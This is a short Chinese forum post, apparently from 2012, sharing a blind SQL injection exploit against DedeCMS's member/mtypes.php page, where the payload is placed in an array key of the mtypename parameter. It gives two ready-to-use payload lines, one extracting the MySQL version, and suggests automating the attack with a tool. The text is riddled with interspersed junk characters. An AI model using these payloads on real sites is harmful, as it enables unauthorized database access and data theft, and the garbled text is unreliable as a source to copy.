需要magic_quotes_gpc = Off,所以说是鸡肋啊.
& c5 t0 z' q& \: r& e |) u" T7 A6 k
) `4 M( r' B& _. w, ]3 c
发生在数组key里的注射漏洞,有点意思.% S- z! A! Q2 {- `% i7 Q
. T: o' t6 M9 B2 q% t5 C4 ^* h这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下4 @5 ~3 @ C9 a# V" t, s; ^" k6 @# t
# _+ e+ q: d# x0 I; t
http://www.xxx.com /dede/member/mtypes.php?dopost=save
/ d& ^+ b% {) j/ a& t- O $ H* b+ e. W3 w1 W1 r" d
exploit:: R( `# F' k2 G, I l
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
u/ c/ {- r! ^0 i( y( ]- y. c- `7 vmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r2 j: H$ Z/ C6 `2 L5 K. S$ B
|
发表于 2012-12-20 08:08:09
收藏
支持
反对